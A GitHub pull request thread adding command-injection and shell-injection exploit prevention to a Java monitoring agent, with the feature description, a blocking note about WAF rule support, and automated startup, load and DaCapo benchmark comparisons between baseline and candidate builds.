Exploit prevention for Shell Injection / Command Injection

[jandro996]

What Does This Do

• Added support for Command Injection (CMDI) exploit prevention:

  • Reused existing instrumentation of java.lang.ProcessImpl.

• Added support for Shell Injection (SHI) exploit prevention:

  • Instrumented java.lang.Runtime#exec(String, String[], File) for detection.
  • Leveraged SHI heuristics as a workaround for cases where the command is a single String, given that WAF heuristics for CMDI only support String[].

• Enhanced RASP metrics mechanism:

  • Introduced a new rule_variant tag to metrics.
    • For CMDI: exec.
    • For SHI: shell.
  • Both variants are categorized under the ruletype as command_injection.

Motivation

Additional Notes

Contributor Checklist

• Format the title according the contribution guidelines
• Assign the type: and (comp: or inst:) labels in addition to any usefull labels
• Squash your commits prior merging or merge using GitHub's Squash and merge
• Don't use close, fix or any linking keywords when referencing an issue.
  Use solves instead, and assign the PR milestone to the issue
• Update the public documentation in case of new configuration flag or behavior

Jira ticket: APPSEC-52330

[jandro996]

Blocked!
At this momento WAF shell injection detection rule available has been designed to specifically target functions which are explicitly or implicitly calling a shell such as /bin/sh or otherwise
We also need support for String[] as the best place to call the WAF is reusing ProcessImplInstrumentation instead of the CallSites

[pr-commenter]

Benchmarks

Startup

Parameters

	Baseline	Candidate
baseline_or_candidate	baseline	candidate
git_branch	master	alejandro.gonzalez/rasp-command-injection
git_commit_date	1734517793	1734523719
git_commit_sha	a19f73a	15ba143
release_version	1.45.0-SNAPSHOT~a19f73a5ea	1.45.0-SNAPSHOT~15ba1436c2

See matching parameters

	Baseline	Candidate
application	insecure-bank	insecure-bank
ci_job_date	1734525980	1734525980
ci_job_id	743638578	743638578
ci_pipeline_id	51433873	51433873
cpu_model	Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz	Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz
module	Agent	Agent
parent	None	None
variant	iast	iast

Summary

Found 0 performance improvements and 0 performance regressions! Performance is the same for 53 metrics, 10 unstable metrics.

Startup time reports for petclinic

gantt
    title petclinic - global startup overhead: candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea

    dateFormat X
    axisFormat %s
section tracing
Agent [baseline] (1.096 s) : 0, 1096171
Total [baseline] (10.46 s) : 0, 10460193
Agent [candidate] (1.101 s) : 0, 1101353
Total [candidate] (10.436 s) : 0, 10435771
section appsec
Agent [baseline] (1.228 s) : 0, 1228153
Total [baseline] (10.736 s) : 0, 10736482
Agent [candidate] (1.247 s) : 0, 1246633
Total [candidate] (10.757 s) : 0, 10757269
section iast
Agent [baseline] (1.225 s) : 0, 1225104
Total [baseline] (10.974 s) : 0, 10973954
Agent [candidate] (1.235 s) : 0, 1234625
Total [candidate] (11.029 s) : 0, 11029322
section profiling
Agent [baseline] (1.325 s) : 0, 1325413
Total [baseline] (10.899 s) : 0, 10898854
Agent [candidate] (1.33 s) : 0, 1329862
Total [candidate] (10.872 s) : 0, 10872133

Loading

• baseline results

Module	Variant	Duration	Δ tracing
Agent	tracing	1.096 s	-
Agent	appsec	1.228 s	131.982 ms (12.0%)
Agent	iast	1.225 s	128.933 ms (11.8%)
Agent	profiling	1.325 s	229.242 ms (20.9%)
Total	tracing	10.46 s	-
Total	appsec	10.736 s	276.289 ms (2.6%)
Total	iast	10.974 s	513.761 ms (4.9%)
Total	profiling	10.899 s	438.66 ms (4.2%)

• candidate results

Module	Variant	Duration	Δ tracing
Agent	tracing	1.101 s	-
Agent	appsec	1.247 s	145.28 ms (13.2%)
Agent	iast	1.235 s	133.272 ms (12.1%)
Agent	profiling	1.33 s	228.509 ms (20.7%)
Total	tracing	10.436 s	-
Total	appsec	10.757 s	321.497 ms (3.1%)
Total	iast	11.029 s	593.551 ms (5.7%)
Total	profiling	10.872 s	436.362 ms (4.2%)

gantt
    title petclinic - break down per module: candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea

    dateFormat X
    axisFormat %s
section tracing
BytebuddyAgent [baseline] (696.496 ms) : 0, 696496
BytebuddyAgent [candidate] (708.467 ms) : 0, 708467
GlobalTracer [baseline] (317.423 ms) : 0, 317423
GlobalTracer [candidate] (315.36 ms) : 0, 315360
AppSec [baseline] (55.045 ms) : 0, 55045
AppSec [candidate] (55.26 ms) : 0, 55260
Remote Config [baseline] (670.863 µs) : 0, 671
Remote Config [candidate] (670.193 µs) : 0, 670
Telemetry [baseline] (12.79 ms) : 0, 12790
Telemetry [candidate] (7.81 ms) : 0, 7810
section appsec
BytebuddyAgent [baseline] (714.575 ms) : 0, 714575
BytebuddyAgent [candidate] (731.562 ms) : 0, 731562
GlobalTracer [baseline] (314.252 ms) : 0, 314252
GlobalTracer [candidate] (314.485 ms) : 0, 314485
AppSec [baseline] (167.215 ms) : 0, 167215
AppSec [candidate] (166.455 ms) : 0, 166455
Remote Config [baseline] (652.937 µs) : 0, 653
Remote Config [candidate] (648.96 µs) : 0, 649
Telemetry [baseline] (7.795 ms) : 0, 7795
Telemetry [candidate] (8.253 ms) : 0, 8253
IAST [baseline] (19.735 ms) : 0, 19735
IAST [candidate] (22.774 ms) : 0, 22774
section iast
BytebuddyAgent [baseline] (816.587 ms) : 0, 816587
BytebuddyAgent [candidate] (828.312 ms) : 0, 828312
GlobalTracer [baseline] (307.237 ms) : 0, 307237
GlobalTracer [candidate] (308.207 ms) : 0, 308207
AppSec [baseline] (57.607 ms) : 0, 57607
AppSec [candidate] (55.385 ms) : 0, 55385
Remote Config [baseline] (623.571 µs) : 0, 624
Remote Config [candidate] (619.071 µs) : 0, 619
Telemetry [baseline] (7.392 ms) : 0, 7392
Telemetry [candidate] (7.406 ms) : 0, 7406
IAST [baseline] (21.869 ms) : 0, 21869
IAST [candidate] (20.904 ms) : 0, 20904
section profiling
BytebuddyAgent [baseline] (692.985 ms) : 0, 692985
BytebuddyAgent [candidate] (701.774 ms) : 0, 701774
GlobalTracer [baseline] (436.077 ms) : 0, 436077
GlobalTracer [candidate] (431.314 ms) : 0, 431314
AppSec [baseline] (53.961 ms) : 0, 53961
AppSec [candidate] (54.427 ms) : 0, 54427
Remote Config [baseline] (670.036 µs) : 0, 670
Remote Config [candidate] (651.029 µs) : 0, 651
Telemetry [baseline] (7.785 ms) : 0, 7785
Telemetry [candidate] (7.779 ms) : 0, 7779
ProfilingAgent [baseline] (94.634 ms) : 0, 94634
ProfilingAgent [candidate] (94.559 ms) : 0, 94559
Profiling [baseline] (94.658 ms) : 0, 94658
Profiling [candidate] (94.584 ms) : 0, 94584

Loading

Startup time reports for insecure-bank

gantt
    title insecure-bank - global startup overhead: candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea

    dateFormat X
    axisFormat %s
section tracing
Agent [baseline] (1.098 s) : 0, 1098435
Total [baseline] (8.677 s) : 0, 8677355
Agent [candidate] (1.102 s) : 0, 1101881
Total [candidate] (8.632 s) : 0, 8631753
section iast
Agent [baseline] (1.224 s) : 0, 1224065
Total [baseline] (9.197 s) : 0, 9197462
Agent [candidate] (1.24 s) : 0, 1240192
Total [candidate] (9.306 s) : 0, 9305851
section iast_HARDCODED_SECRET_DISABLED
Agent [baseline] (1.238 s) : 0, 1238173
Total [baseline] (9.179 s) : 0, 9178851
Agent [candidate] (1.24 s) : 0, 1240194
Total [candidate] (9.242 s) : 0, 9242408
section iast_TELEMETRY_OFF
Agent [baseline] (1.22 s) : 0, 1219885
Total [baseline] (9.199 s) : 0, 9198795
Agent [candidate] (1.234 s) : 0, 1233606
Total [candidate] (9.254 s) : 0, 9253664

Loading

• baseline results

Module	Variant	Duration	Δ tracing
Agent	tracing	1.098 s	-
Agent	iast	1.224 s	125.63 ms (11.4%)
Agent	iast_HARDCODED_SECRET_DISABLED	1.238 s	139.738 ms (12.7%)
Agent	iast_TELEMETRY_OFF	1.22 s	121.45 ms (11.1%)
Total	tracing	8.677 s	-
Total	iast	9.197 s	520.106 ms (6.0%)
Total	iast_HARDCODED_SECRET_DISABLED	9.179 s	501.496 ms (5.8%)
Total	iast_TELEMETRY_OFF	9.199 s	521.44 ms (6.0%)

• candidate results

Module	Variant	Duration	Δ tracing
Agent	tracing	1.102 s	-
Agent	iast	1.24 s	138.311 ms (12.6%)
Agent	iast_HARDCODED_SECRET_DISABLED	1.24 s	138.313 ms (12.6%)
Agent	iast_TELEMETRY_OFF	1.234 s	131.726 ms (12.0%)
Total	tracing	8.632 s	-
Total	iast	9.306 s	674.098 ms (7.8%)
Total	iast_HARDCODED_SECRET_DISABLED	9.242 s	610.656 ms (7.1%)
Total	iast_TELEMETRY_OFF	9.254 s	621.911 ms (7.2%)

gantt
    title insecure-bank - break down per module: candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea

    dateFormat X
    axisFormat %s
section tracing
BytebuddyAgent [baseline] (698.76 ms) : 0, 698760
BytebuddyAgent [candidate] (709.363 ms) : 0, 709363
GlobalTracer [baseline] (319.208 ms) : 0, 319208
GlobalTracer [candidate] (315.244 ms) : 0, 315244
AppSec [baseline] (55.19 ms) : 0, 55190
AppSec [candidate] (55.004 ms) : 0, 55004
Remote Config [baseline] (673.215 µs) : 0, 673
Remote Config [candidate] (679.014 µs) : 0, 679
Telemetry [baseline] (10.822 ms) : 0, 10822
Telemetry [candidate] (7.814 ms) : 0, 7814
section iast
BytebuddyAgent [baseline] (816.015 ms) : 0, 816015
BytebuddyAgent [candidate] (831.647 ms) : 0, 831647
GlobalTracer [baseline] (306.937 ms) : 0, 306937
GlobalTracer [candidate] (307.953 ms) : 0, 307953
AppSec [baseline] (57.223 ms) : 0, 57223
AppSec [candidate] (57.569 ms) : 0, 57569
IAST [baseline] (22.003 ms) : 0, 22003
IAST [candidate] (21.057 ms) : 0, 21057
Remote Config [baseline] (630.623 µs) : 0, 631
Remote Config [candidate] (620.933 µs) : 0, 621
Telemetry [baseline] (7.513 ms) : 0, 7513
Telemetry [candidate] (7.456 ms) : 0, 7456
section iast_HARDCODED_SECRET_DISABLED
BytebuddyAgent [baseline] (826.37 ms) : 0, 826370
BytebuddyAgent [candidate] (831.013 ms) : 0, 831013
GlobalTracer [baseline] (309.862 ms) : 0, 309862
GlobalTracer [candidate] (309.999 ms) : 0, 309999
AppSec [baseline] (57.775 ms) : 0, 57775
AppSec [candidate] (56.044 ms) : 0, 56044
IAST [baseline] (22.13 ms) : 0, 22130
IAST [candidate] (21.167 ms) : 0, 21167
Remote Config [baseline] (624.849 µs) : 0, 625
Remote Config [candidate] (643.06 µs) : 0, 643
Telemetry [baseline] (7.486 ms) : 0, 7486
Telemetry [candidate] (7.473 ms) : 0, 7473
section iast_TELEMETRY_OFF
BytebuddyAgent [baseline] (812.347 ms) : 0, 812347
BytebuddyAgent [candidate] (826.924 ms) : 0, 826924
GlobalTracer [baseline] (306.409 ms) : 0, 306409
GlobalTracer [candidate] (306.342 ms) : 0, 306342
AppSec [baseline] (57.738 ms) : 0, 57738
AppSec [candidate] (56.911 ms) : 0, 56911
IAST [baseline] (21.672 ms) : 0, 21672
IAST [candidate] (21.556 ms) : 0, 21556
Remote Config [baseline] (616.424 µs) : 0, 616
Remote Config [candidate] (620.71 µs) : 0, 621
Telemetry [baseline] (7.364 ms) : 0, 7364
Telemetry [candidate] (7.392 ms) : 0, 7392

Loading

Load

Parameters

	Baseline	Candidate
baseline_or_candidate	baseline	candidate
end_time	2024-12-18T12:16:23	2024-12-18T12:23:23
git_branch	master	alejandro.gonzalez/rasp-command-injection
git_commit_date	1734517793	1734523719
git_commit_sha	a19f73a	15ba143
release_version	1.45.0-SNAPSHOT~a19f73a5ea	1.45.0-SNAPSHOT~15ba1436c2
start_time	2024-12-18T12:16:09	2024-12-18T12:23:09

See matching parameters

	Baseline	Candidate
application	insecure-bank	insecure-bank
ci_job_date	1734524955	1734524955
ci_job_id	743638579	743638579
ci_pipeline_id	51433873	51433873
cpu_model	Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz	Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz
variant	iast	iast

Summary

Found 1 performance improvements and 0 performance regressions! Performance is the same for 11 metrics, 16 unstable metrics.

scenario	Δ mean http_req_duration	Δ mean throughput	candidate mean http_req_duration	candidate mean throughput	baseline mean http_req_duration	baseline mean throughput
scenario:load:petclinic:profiling	better [-91.162µs; -40.157µs] or [-5.817%; -2.563%]	unstable [-443.351op/s; +671.271op/s] or [-14.963%; +22.655%]	1.501ms	3076.923op/s	1.567ms	2962.963op/s

Request duration reports for insecure-bank

gantt
    title insecure-bank - request duration [CI 0.99] : candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea
    dateFormat X
    axisFormat %s
section baseline
no_agent (376.733 µs) : 356, 397
.   : milestone, 377,
iast (493.966 µs) : 472, 516
.   : milestone, 494,
iast_FULL (656.743 µs) : 635, 678
.   : milestone, 657,
iast_GLOBAL (527.998 µs) : 505, 551
.   : milestone, 528,
iast_HARDCODED_SECRET_DISABLED (490.584 µs) : 469, 512
.   : milestone, 491,
iast_INACTIVE (451.004 µs) : 430, 472
.   : milestone, 451,
iast_TELEMETRY_OFF (486.848 µs) : 465, 509
.   : milestone, 487,
tracing (448.668 µs) : 428, 470
.   : milestone, 449,
section candidate
no_agent (376.292 µs) : 357, 396
.   : milestone, 376,
iast (496.882 µs) : 475, 518
.   : milestone, 497,
iast_FULL (653.745 µs) : 632, 675
.   : milestone, 654,
iast_GLOBAL (519.084 µs) : 498, 540
.   : milestone, 519,
iast_HARDCODED_SECRET_DISABLED (488.673 µs) : 468, 510
.   : milestone, 489,
iast_INACTIVE (451.08 µs) : 430, 472
.   : milestone, 451,
iast_TELEMETRY_OFF (480.04 µs) : 459, 501
.   : milestone, 480,
tracing (453.533 µs) : 432, 475
.   : milestone, 454,

Loading

• baseline results

Variant	Request duration [CI 0.99]	Δ no_agent
no_agent	376.733 µs [356.311 µs, 397.155 µs]	-
iast	493.966 µs [472.267 µs, 515.666 µs]	117.233 µs (31.1%)
iast_FULL	656.743 µs [635.23 µs, 678.256 µs]	280.01 µs (74.3%)
iast_GLOBAL	527.998 µs [505.333 µs, 550.663 µs]	151.265 µs (40.2%)
iast_HARDCODED_SECRET_DISABLED	490.584 µs [469.084 µs, 512.084 µs]	113.85 µs (30.2%)
iast_INACTIVE	451.004 µs [430.026 µs, 471.981 µs]	74.27 µs (19.7%)
iast_TELEMETRY_OFF	486.848 µs [465.078 µs, 508.619 µs]	110.115 µs (29.2%)
tracing	448.668 µs [427.586 µs, 469.749 µs]	71.934 µs (19.1%)

• candidate results

Variant	Request duration [CI 0.99]	Δ no_agent
no_agent	376.292 µs [356.643 µs, 395.942 µs]	-
iast	496.882 µs [475.329 µs, 518.435 µs]	120.59 µs (32.0%)
iast_FULL	653.745 µs [632.227 µs, 675.264 µs]	277.453 µs (73.7%)
iast_GLOBAL	519.084 µs [497.894 µs, 540.274 µs]	142.791 µs (37.9%)
iast_HARDCODED_SECRET_DISABLED	488.673 µs [467.526 µs, 509.82 µs]	112.381 µs (29.9%)
iast_INACTIVE	451.08 µs [430.274 µs, 471.886 µs]	74.788 µs (19.9%)
iast_TELEMETRY_OFF	480.04 µs [458.79 µs, 501.291 µs]	103.748 µs (27.6%)
tracing	453.533 µs [431.738 µs, 475.328 µs]	77.24 µs (20.5%)

Request duration reports for petclinic

gantt
    title petclinic - request duration [CI 0.99] : candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea
    dateFormat X
    axisFormat %s
section baseline
no_agent (1.365 ms) : 1345, 1384
.   : milestone, 1365,
appsec (1.751 ms) : 1728, 1775
.   : milestone, 1751,
appsec_no_iast (1.757 ms) : 1731, 1782
.   : milestone, 1757,
iast (1.492 ms) : 1470, 1514
.   : milestone, 1492,
profiling (1.567 ms) : 1543, 1591
.   : milestone, 1567,
tracing (1.491 ms) : 1467, 1516
.   : milestone, 1491,
section candidate
no_agent (1.368 ms) : 1348, 1387
.   : milestone, 1368,
appsec (1.746 ms) : 1722, 1769
.   : milestone, 1746,
appsec_no_iast (1.758 ms) : 1734, 1781
.   : milestone, 1758,
iast (1.488 ms) : 1465, 1511
.   : milestone, 1488,
profiling (1.501 ms) : 1478, 1525
.   : milestone, 1501,
tracing (1.469 ms) : 1444, 1495
.   : milestone, 1469,

Loading

• baseline results

Variant	Request duration [CI 0.99]	Δ no_agent
no_agent	1.365 ms [1.345 ms, 1.384 ms]	-
appsec	1.751 ms [1.728 ms, 1.775 ms]	386.575 µs (28.3%)
appsec_no_iast	1.757 ms [1.731 ms, 1.782 ms]	392.124 µs (28.7%)
iast	1.492 ms [1.47 ms, 1.514 ms]	127.589 µs (9.3%)
profiling	1.567 ms [1.543 ms, 1.591 ms]	202.459 µs (14.8%)
tracing	1.491 ms [1.467 ms, 1.516 ms]	126.579 µs (9.3%)

• candidate results

Variant	Request duration [CI 0.99]	Δ no_agent
no_agent	1.368 ms [1.348 ms, 1.387 ms]	-
appsec	1.746 ms [1.722 ms, 1.769 ms]	377.989 µs (27.6%)
appsec_no_iast	1.758 ms [1.734 ms, 1.781 ms]	389.892 µs (28.5%)
iast	1.488 ms [1.465 ms, 1.511 ms]	119.945 µs (8.8%)
profiling	1.501 ms [1.478 ms, 1.525 ms]	133.782 µs (9.8%)
tracing	1.469 ms [1.444 ms, 1.495 ms]	101.591 µs (7.4%)

Dacapo

Parameters

	Baseline	Candidate
baseline_or_candidate	baseline	candidate
git_branch	master	alejandro.gonzalez/rasp-command-injection
git_commit_date	1734517793	1734523719
git_commit_sha	a19f73a	15ba143
release_version	1.45.0-SNAPSHOT~a19f73a5ea	1.45.0-SNAPSHOT~15ba1436c2

See matching parameters

	Baseline	Candidate
application	biojava	biojava
ci_job_date	1734525639	1734525639
ci_job_id	743638580	743638580
ci_pipeline_id	51433873	51433873
cpu_model	Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz	Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz
variant	appsec	appsec

Summary

Found 0 performance improvements and 0 performance regressions! Performance is the same for 12 metrics, 0 unstable metrics.

Execution time for biojava

gantt
    title biojava - execution time [CI 0.99] : candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea
    dateFormat X
    axisFormat %s
section baseline
no_agent (15.004 s) : 15004000, 15004000
.   : milestone, 15004000,
appsec (14.944 s) : 14944000, 14944000
.   : milestone, 14944000,
iast (18.657 s) : 18657000, 18657000
.   : milestone, 18657000,
iast_GLOBAL (18.005 s) : 18005000, 18005000
.   : milestone, 18005000,
profiling (15.215 s) : 15215000, 15215000
.   : milestone, 15215000,
tracing (15.098 s) : 15098000, 15098000
.   : milestone, 15098000,
section candidate
no_agent (15.222 s) : 15222000, 15222000
.   : milestone, 15222000,
appsec (14.885 s) : 14885000, 14885000
.   : milestone, 14885000,
iast (18.779 s) : 18779000, 18779000
.   : milestone, 18779000,
iast_GLOBAL (17.876 s) : 17876000, 17876000
.   : milestone, 17876000,
profiling (15.44 s) : 15440000, 15440000
.   : milestone, 15440000,
tracing (15.198 s) : 15198000, 15198000
.   : milestone, 15198000,

Loading

• baseline results

Variant	Execution Time [CI 0.99]	Δ no_agent
no_agent	15.004 s [15.004 s, 15.004 s]	-
appsec	14.944 s [14.944 s, 14.944 s]	-60.0 ms (-0.4%)
iast	18.657 s [18.657 s, 18.657 s]	3.653 s (24.3%)
iast_GLOBAL	18.005 s [18.005 s, 18.005 s]	3.001 s (20.0%)
profiling	15.215 s [15.215 s, 15.215 s]	211.0 ms (1.4%)
tracing	15.098 s [15.098 s, 15.098 s]	94.0 ms (0.6%)

• candidate results

Variant	Execution Time [CI 0.99]	Δ no_agent
no_agent	15.222 s [15.222 s, 15.222 s]	-
appsec	14.885 s [14.885 s, 14.885 s]	-337.0 ms (-2.2%)
iast	18.779 s [18.779 s, 18.779 s]	3.557 s (23.4%)
iast_GLOBAL	17.876 s [17.876 s, 17.876 s]	2.654 s (17.4%)
profiling	15.44 s [15.44 s, 15.44 s]	218.0 ms (1.4%)
tracing	15.198 s [15.198 s, 15.198 s]	-24.0 ms (-0.2%)

Execution time for tomcat

gantt
    title tomcat - execution time [CI 0.99] : candidate=1.45.0-SNAPSHOT~15ba1436c2, baseline=1.45.0-SNAPSHOT~a19f73a5ea
    dateFormat X
    axisFormat %s
section baseline
no_agent (1.48 ms) : 1469, 1492
.   : milestone, 1480,
appsec (2.36 ms) : 2319, 2402
.   : milestone, 2360,
iast (2.1 ms) : 2047, 2154
.   : milestone, 2100,
iast_GLOBAL (2.142 ms) : 2088, 2195
.   : milestone, 2142,
profiling (1.979 ms) : 1935, 2023
.   : milestone, 1979,
tracing (1.936 ms) : 1895, 1977
.   : milestone, 1936,
section candidate
no_agent (1.475 ms) : 1463, 1486
.   : milestone, 1475,
appsec (2.365 ms) : 2322, 2407
.   : milestone, 2365,
iast (2.089 ms) : 2036, 2142
.   : milestone, 2089,
iast_GLOBAL (2.137 ms) : 2084, 2190
.   : milestone, 2137,
profiling (1.99 ms) : 1947, 2034
.   : milestone, 1990,
tracing (1.932 ms) : 1891, 1972
.   : milestone, 1932,

Loading

• baseline results

Variant	Execution Time [CI 0.99]	Δ no_agent
no_agent	1.48 ms [1.469 ms, 1.492 ms]	-
appsec	2.36 ms [2.319 ms, 2.402 ms]	880.128 µs (59.5%)
iast	2.1 ms [2.047 ms, 2.154 ms]	620.246 µs (41.9%)
iast_GLOBAL	2.142 ms [2.088 ms, 2.195 ms]	661.384 µs (44.7%)
profiling	1.979 ms [1.935 ms, 2.023 ms]	498.55 µs (33.7%)
tracing	1.936 ms [1.895 ms, 1.977 ms]	455.814 µs (30.8%)

• candidate results

Variant	Execution Time [CI 0.99]	Δ no_agent
no_agent	1.475 ms [1.463 ms, 1.486 ms]	-
appsec	2.365 ms [2.322 ms, 2.407 ms]	890.003 µs (60.4%)
iast	2.089 ms [2.036 ms, 2.142 ms]	614.524 µs (41.7%)
iast_GLOBAL	2.137 ms [2.084 ms, 2.19 ms]	662.587 µs (44.9%)
profiling	1.99 ms [1.947 ms, 2.034 ms]	515.937 µs (35.0%)
tracing	1.932 ms [1.891 ms, 1.972 ms]	456.957 µs (31.0%)

[github-actions]

Hi! 👋 Thanks for your pull request! 🎉

To help us review it, please make sure to:

• Add at least one type, and one component or instrumentation label to the pull request

If you need help, please check our contributing guidelines.

[smola]

Not for this PR, since this just follows the current convention, but we should probably move RASP/APPSEC/IAST code in instrumentations to *.iast packages, to make sure codeowners apply to our team instead of APM IDM.